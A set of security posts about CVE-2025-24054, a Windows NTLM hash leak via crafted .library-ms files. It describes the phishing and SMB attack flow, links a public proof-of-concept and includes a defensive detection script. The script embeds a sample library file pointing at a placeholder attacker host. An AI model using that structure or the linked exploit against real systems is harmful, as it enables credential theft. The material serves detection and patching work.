Crazy example of a real NTLM exploit in action: a PDF, a single click, and boom—credentials compromised.
This is CVE-2025-24054 in the wild.
Stay sharp. The bad actors sure are.
#CyberSecurity #Infosec #NTLM #ThreatIntel #RedTeam #CVE202524054
Heads up, security folks!
There’s a fresh CVE out in the wild—CVE-2025-24054—and it’s not messing around.
This one abuses Windows .library-ms files to sneakily leak your NTLMv2 hashes. Just previewing a malicious file could trigger it—no clicks needed. Yep, that easy for attackers to get their foot in the door.
The kicker? It’s already being exploited in the wild, just days after Microsoft’s patch dropped in March. First targets were spotted in Poland and Romania, but we all know these things don’t stay local for long.
What to do:
• Patch now (if you haven’t already).
• Block suspicious SMB traffic.
• Rethink NTLM—disable it where you can.
Full breakdown from Check Point here:
https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/
#CyberSecurity #Infosec #Windows #NTLM #CVE202524054 #BlueTeam #PatchNow
NTLM (New Technology LAN Manager) is a suite of authentication protocols developed by Microsoft to verify user identities and protect the integrity and confidentiality of network communications. NTLM operates through a direct client-server exchange known as the NTLM challenge/response mechanism, in which the server challenges the client to prove its identity without […]
Ok, enough of this mushy philosophical shit, let's talk tech.
Check out the mind-blowingly simple 24054 PoC that is being used in active exploitation.
https://github.com/xigney/CVE-2025-24054_PoC/blob/main/PoC.py
⚠️ CVE-2025-24054 is now under active attack — and it only takes a single click to leak NTLM hashes from a Windows system.
CISA has added this medium-severity Windows vulnerability to its Known Exploited Vulnerabilities catalog after confirming exploitation in the wild. The flaw enables attackers to harvest NTLM credentials through specially crafted .library-ms files.
Here’s how it works:
- A user receives a malicious file — even a single click (no execution needed) can trigger NTLM hash leakage
- Attackers send these files via phishing emails, often packed in ZIP archives or delivered directly
- Opening the archive or previewing the file initiates an SMB request, leaking NTLMv2-SSP hashes
- These hashes can then be used for pass-the-hash or lateral movement attacks inside the network
Check Point reports that the vulnerability has been exploited in at least 10 campaigns so far, targeting government and private organizations in Poland, Romania, Ukraine, and Colombia.
What makes this threat more dangerous:
- NTLM is deprecated but still present in many environments
- Minimal user interaction is required — just download and extract
- It bypasses common detection tools by triggering quietly in Windows Explorer
- It's a variant of a previously exploited flaw (CVE-2024-43451)
Microsoft patched the flaw in March, but exploitation began almost immediately. Agencies under the FCEB have until May 8 to patch — but every organization should act sooner.
At @Efani we view this as another reminder that legacy protocols like NTLM are low-hanging fruit for attackers. Even medium-severity flaws can become major risks when they require near-zero user interaction.
Patch. Audit. Replace legacy auth where possible.
#CyberSecurity #NTLM #WindowsVulnerability #CVE202524054 #CredentialSecurity #EfaniSecure
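The posts above describe the trigger (a .library-ms file that makes Explorer issue an SMB request) and the mitigations (block outbound SMB, disable NTLM). A practical blue-team complement is to triage .library-ms attachments before they reach a desktop. The following is an added example, not code from any of the posts or from Check Point: it parses the XML library-description format that .library-ms files use and flags any `<simpleLocation>/<url>` entry pointing at a UNC host outside an allowlist. The sample document and the 203.0.113.10 address are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by Windows library-description (.library-ms) documents.
NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}
# \\host\share... -> capture the host part.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")

# Constructed sample: one benign knownfolder entry plus one UNC location
# on a documentation-range IP (placeholder, not a real indicator).
SAMPLE_LIBRARY_MS = r"""<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url></simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation><url>\\203.0.113.10\share</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

def library_ms_locations(xml_text):
    """Return every <url> under <simpleLocation> in a .library-ms document."""
    root = ET.fromstring(xml_text)
    return [el.text.strip() for el in root.iterfind(".//lib:simpleLocation/lib:url", NS) if el.text]

def classify_location(url):
    """Classify a library location as 'knownfolder', 'unc', 'local' or 'other'."""
    if url.lower().startswith("knownfolder:"):
        return "knownfolder"
    if UNC_RE.match(url):
        return "unc"
    if re.match(r"^[A-Za-z]:\\", url):
        return "local"
    return "other"

def suspicious_unc_hosts(xml_text, trusted_hosts=()):
    """Return UNC hosts referenced by the library that are not in trusted_hosts.
    Rendering such a library in Explorer makes the client attempt an SMB session
    (and therefore NTLM authentication) to that host, which is the leak path."""
    trusted = {h.lower() for h in trusted_hosts}
    hosts = []
    for url in library_ms_locations(xml_text):
        m = UNC_RE.match(url)
        if m and m.group(1).lower() not in trusted:
            hosts.append(m.group(1))
    return hosts

if __name__ == "__main__":
    print(suspicious_unc_hosts(SAMPLE_LIBRARY_MS))  # ['203.0.113.10']
```

Feed it each .library-ms pulled from mail quarantine or a ZIP attachment; any non-empty result is worth blocking at the gateway, alongside the outbound SMB egress rule the posts recommend.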
Windows systems are under threat! A tiny flaw now lets hackers steal sensitive credentials with just a folder click. How safe is your PC against these crafty phishing attacks? Read more on this alarming vulnerability.
#cve202524054
#windowsvulnerability
#ntlmhash
#cybersecurity
#phishingattacks